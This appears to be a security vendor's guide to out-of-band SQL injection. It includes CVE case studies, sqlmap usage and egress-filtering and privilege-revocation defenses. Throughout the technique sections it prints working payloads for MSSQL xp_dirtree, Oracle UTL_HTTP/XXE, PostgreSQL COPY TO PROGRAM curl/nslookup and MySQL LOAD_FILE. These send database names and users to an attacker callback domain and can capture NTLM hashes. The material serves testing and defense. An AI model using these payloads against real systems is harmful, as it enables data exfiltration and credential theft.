Exfiltrates data through a secondary channel such as DNS lookups or HTTP callbacks, useful when in-band responses are not available.
TL;DR
xp_dirtree is the most reliable OOB vector — works with default privilegesUTL_HTTP privilege requirementsREPLACE() for special charactersOut-of-band (OOB) SQL injection extracts data through a secondary network channel rather than the HTTP response. Instead of reading data from the response body (union-based, error-based) or inferring it from response behavior (blind boolean, time-based), the attacker causes the database server to initiate outbound network connections — DNS lookups, HTTP requests, or SMB connections — to an attacker-controlled callback server. The extracted data travels as DNS subdomain labels or HTTP request paths.
OOB is used in three scenarios where in-band channels are exhausted: (1) the application returns identical responses for all queries and time-based techniques are unreliable due to network jitter or caching; (2) the application processes requests asynchronously and the HTTP response is returned before query execution completes; (3) WAFs and network controls block known SQL injection patterns in HTTP responses but do not filter outbound DNS from the database tier.
CVE-2024-43468 (Microsoft SCCM, CVSS 9.8, CISA KEV February 2026) included OOB exfiltration via MSSQL xp_dirtree in Synacktiv's published proof-of-concept. The attacker sent a UNC path encoding DB_NAME() as a DNS subdomain to confirm the injection was real before escalating to xp_cmdshell for full OS command execution. No credentials were required for either step.
OOB injection requires a database function capable of initiating outbound network connections — a capability that varies significantly between database engines and privilege levels.
The DNS exfiltration flow: the database constructs a string containing target data, appends an attacker-controlled domain, and performs a DNS lookup. The DNS query travels from the database server's network interface to the attacker's DNS server. The subdomain label is the extracted data.
xp_dirtree is an undocumented MSSQL extended stored procedure that lists directory contents of a network path. When given a UNC path (\\hostname\share), MSSQL performs DNS resolution for the hostname component. This DNS query is observable at the attacker's DNS server.
-- Basic DNS ping — confirm OOB channel works
'; EXEC master..xp_dirtree '\\attacker.interactsh.com\a'--
-- Data exfiltration — DB_NAME() in subdomain
'; EXEC master..xp_dirtree '//' + DB_NAME() + '.attacker.interactsh.com/a'--
-- User and version in subdomain
'; EXEC master..xp_dirtree '//' + SYSTEM_USER + '.' + @@version + '.attacker.interactsh.com/a'--
-- RFC 1035-safe encoding (handles spaces, slashes, colons in values)
DECLARE @v NVARCHAR(256);
SELECT @v = DB_NAME();
SELECT @v = REPLACE(@v, ' ', '-');
SELECT @v = REPLACE(@v, '/', '-');
DECLARE @cmd NVARCHAR(4000);
SET @cmd = '\\' + @v + '.attacker.interactsh.com\a';
EXEC master.dbo.xp_dirtree @cmd;xp_fileexist alternative (less common, same privilege level):
'; EXEC master..xp_fileexist '\\' + DB_NAME() + '.attacker.interactsh.com\test'--xp_dirtree requires no special database privileges beyond the default user context in MSSQL — it is enabled by default and works with any authenticated database session, making it the most accessible OOB vector.
Oracle provides two OOB paths with different privilege requirements.
UTL_HTTP (requires EXECUTE on UTL_HTTP package):
-- HTTP callback with data in URL path
' UNION SELECT UTL_HTTP.REQUEST(
'http://attacker.interactsh.com/' || (SELECT user FROM dual)
) FROM dual--
-- DNS via UTL_INADDR (requires EXECUTE on UTL_INADDR)
' UNION SELECT UTL_INADDR.GET_HOST_ADDRESS(
(SELECT user FROM dual) || '.attacker.interactsh.com'
) FROM dual--XMLTYPE OOB (does not require UTL_HTTP — works via XML external entity resolution):
' UNION SELECT EXTRACTVALUE(
XMLTYPE('<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY % remote
SYSTEM "http://' || (SELECT user FROM dual) || '.attacker.interactsh.com/">
%remote;]>'),
'/l'
) FROM dual--The XMLTYPE technique leverages Oracle's XML processing engine to resolve an external entity reference. The SYSTEM URL contains the target data as a subdomain. This bypasses the UTL_HTTP privilege requirement and is frequently overlooked by database security configurations that restrict standard network packages.
-- dblink HTTP callback (requires dblink extension)
'; SELECT dblink_connect(
'host=' || (SELECT current_user) || '.attacker.interactsh.com user=a password=a dbname=a'
)--
-- COPY TO PROGRAM DNS (requires superuser privilege)
'; COPY (SELECT '') TO PROGRAM
'nslookup ' || current_user || '.attacker.interactsh.com'--
'; COPY (SELECT current_database()) TO PROGRAM
'curl http://attacker.interactsh.com/' --The COPY TO PROGRAM technique executes a shell command on the PostgreSQL server host, enabling any outbound connection method available on the host OS. This requires the pg_execute_server_program role (superuser in PostgreSQL < 14).
-- DNS via LOAD_FILE UNC path (Windows MySQL only, requires FILE privilege)
' AND LOAD_FILE(CONCAT('\\\\', (SELECT version()), '.attacker.interactsh.com\\a'))-- -
-- NTLM hash theft via UNC path
' AND LOAD_FILE('\\\\attacker.smb.server\\share')-- -This technique is limited to MySQL running on Windows with the FILE privilege granted and secure_file_priv unset. It is rare in modern deployments but common in legacy shared hosting environments.
BreachVex implements a unique-per-injection-point token registry for OOB confirmation:
# DBMS-specific out-of-band DNS payloads
oob_dns_payloads = {
"mysql": "' UNION SELECT LOAD_FILE(CONCAT('\\\\',version(),'.{subdomain}\\a'))-- -",
"postgresql": "'; COPY (SELECT '') TO PROGRAM 'nslookup {subdomain}'-- -",
"mssql": "'; EXEC master..xp_dirtree '\\\\{subdomain}\\a'-- -",
"oracle": "' UNION SELECT UTL_HTTP.request('http://{subdomain}/') FROM dual-- -",
}
# OOB token flow:
# 1. Provision a unique out-of-band callback token per injection point
# 2. Embed the token in the DBMS-specific DNS payload
# 3. Inject into storage endpoint (store/register/profile)
# 4. Trigger retrieval endpoint (export/admin/search)
# 5. Listen for inbound DNS/HTTP callbacks
# 6. Match callback token to injection point → CONFIRMEDThis architecture enables second-order OOB detection: the payload is stored at one endpoint and executes when another endpoint retrieves and re-uses the stored value. Standard DAST scanners cannot detect this without second-URL configuration.
CVE-2024-43468 — Microsoft SCCM (CVSS 9.8, CISA KEV February 2026) — Pre-authenticated SQL injection in Microsoft Configuration Manager's MP_Location service. Synacktiv's public PoC (published November 2024) used xp_dirtree OOB to confirm injection by exfiltrating DB_NAME() as a DNS subdomain. The confirmation served as proof before escalating to stacked queries (EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE) for full OS shell access. CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Federal agencies had until March 5, 2026 to patch.
HackerOne #435066 — HackerOne GraphQL Endpoint — SQL injection in HackerOne's own /graphql endpoint via the embedded_submission_form_uuid parameter. The researcher used OOB DNS callbacks to confirm blind injection and extract data from both public and private schema tables, demonstrating that OOB techniques apply to GraphQL API endpoints — not just traditional web forms.
MOVEit Transfer (CVE-2023-34362, CVSS 9.8, 2023) — Zero-day SQL injection in Progress Software's MOVEit Transfer. Cl0p ransomware group exploited the vulnerability using a combination of SQLi techniques including OOB exfiltration to extract files from organizational file transfer systems. The attack affected 80% of US corporate victims before patching. Amazon employee data was among the records subsequently sold.
NetSPI Second-Order OOB Research (2024) — NetSPI published research demonstrating the complete second-order OOB attack chain: store a payload with xp_dirtree in a date range field via /api/report/; trigger execution via /api/report/ExportToExcel; observe the DNS callback at the attacker-controlled domain. The research showed that a 20-second WAITFOR DELAY confirmation and DNS-based data exfiltration are achievable via stored SQL injection that bypasses all input validation at the entry point.
xp_dirtree is enabled by default on MSSQL and does not require elevated database privileges. WAFs inspecting HTTP request parameters cannot see outbound DNS queries from the database server tier. OOB injection bypasses both input validation and WAF protection simultaneously. The only effective control is network egress filtering at the database server level and parameterized queries.
abc123.interactsh.com).'; EXEC master..xp_dirtree '\\abc123.interactsh.com\a'-- into MSSQL parameters.'; SELECT pg_sleep(0); COPY (SELECT '') TO PROGRAM 'nslookup abc123.interactsh.com'-- for PostgreSQL.' UNION SELECT UTL_HTTP.request('http://abc123.interactsh.com/') FROM dual-- for Oracle.sqlmap --second-url or manually trigger retrieval endpoints after storing payloads.# sqlmap OOB with Interactsh domain
sqlmap -u "https://target.com/search?q=1" \
--dns-domain=abc123.interactsh.com \
--technique=Q --batch
# MSSQL-specific OOB
sqlmap -u "https://target.com/search?q=1" \
--dbms=mssql --technique=Q \
--dns-domain=abc123.interactsh.com --batch
# Second-order OOB
sqlmap -u "https://target.com/store" \
--data="field=*" \
--second-url="https://target.com/trigger" \
--dns-domain=abc123.interactsh.com \
--technique=Q --batchBreachVex detects OOB injection using a unique-per-injection-point callback token registry: each injection point receives a unique out-of-band callback token, the DBMS-specific DNS payload is injected, and inbound callbacks are monitored. A callback matching the token confirms the injection with high confidence.
Parameterized queries prevent injection at the application layer. Network egress filtering prevents OOB exfiltration at the infrastructure layer, providing defense-in-depth.
Database server egress rules (principle of least network privilege):
ALLOW outbound → database backup destination
ALLOW outbound → trusted monitoring endpoints
DENY outbound → port 53 (DNS) [block OOB DNS]
DENY outbound → port 80/443 (HTTP) [block UTL_HTTP, dblink]
DENY outbound → port 445 (SMB) [block xp_dirtree UNC/NTLM]
DENY all other outbound-- MSSQL: disable xp_dirtree and related procedures
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
-- Revoke execute on xp_dirtree
REVOKE EXECUTE ON master.dbo.xp_dirtree FROM PUBLIC;
REVOKE EXECUTE ON master.dbo.xp_fileexist FROM PUBLIC;
REVOKE EXECUTE ON master.dbo.xp_cmdshell FROM PUBLIC;-- Oracle: revoke UTL_HTTP and UTL_INADDR grants
REVOKE EXECUTE ON UTL_HTTP FROM PUBLIC;
REVOKE EXECUTE ON UTL_INADDR FROM PUBLIC;
-- Note: XMLTYPE OOB requires Oracle Text restriction — consult Oracle documentationNetwork egress filtering at the database tier is a high-value control that is frequently missing. Many organizations apply WAF rules to HTTP inputs but leave database servers with unrestricted outbound internet access. This allows OOB exfiltration even when all in-band injection channels are blocked.
Out-of-band SQL injection causes the database server to initiate outbound network connections — typically DNS lookups or HTTP requests — to an attacker-controlled callback server. Extracted data is encoded in the subdomain label or HTTP request path, bypassing in-band response channels entirely.
xp_dirtree is an undocumented MSSQL extended stored procedure that accesses network paths. When given a UNC path pointing to an attacker-controlled domain (e.g., \DB_NAME().attacker.com\a), MSSQL performs a DNS resolution for that domain, creating an observable DNS callback that confirms injection and exfiltrates data.
UTL_HTTP and UTL_INADDR require EXECUTE grants on those packages, which are not granted by default. However, the XMLTYPE OOB technique via XML external entities does not require UTL_HTTP and works on most Oracle installations with Oracle Text enabled, making it a more reliable option.
Interactsh is an open-source OOB interaction server developed by ProjectDiscovery that captures DNS, HTTP, and SMTP callbacks with unique subdomain tokens. BreachVex provisions a unique out-of-band callback token per injection point, embeds it in the OOB payload, listens for inbound DNS/HTTP callbacks, and confirms injection when a callback carrying the matching token is received.
CVE-2024-43468 (Microsoft SCCM, CVSS 9.8) used MSSQL xp_dirtree OOB chaining as part of the pre-authenticated RCE exploit chain. The Synacktiv PoC used xp_dirtree to exfiltrate the DB_NAME() value via DNS callback as proof of exploitation before escalating to xp_cmdshell.
RFC 1035 limits DNS labels to 63 characters, alphanumeric plus hyphens. Database names containing spaces, slashes, or special characters must be transformed before embedding in a DNS subdomain. MSSQL REPLACE() removes spaces; SUBSTRING() chunks long values across multiple DNS queries.
Yes. PostgreSQL supports two OOB techniques: dblink_connect() for HTTP-based callbacks (requires the dblink extension), and COPY TO PROGRAM with nslookup or curl (requires superuser privilege). The dblink approach works at lower privilege levels but requires the dblink extension to be installed.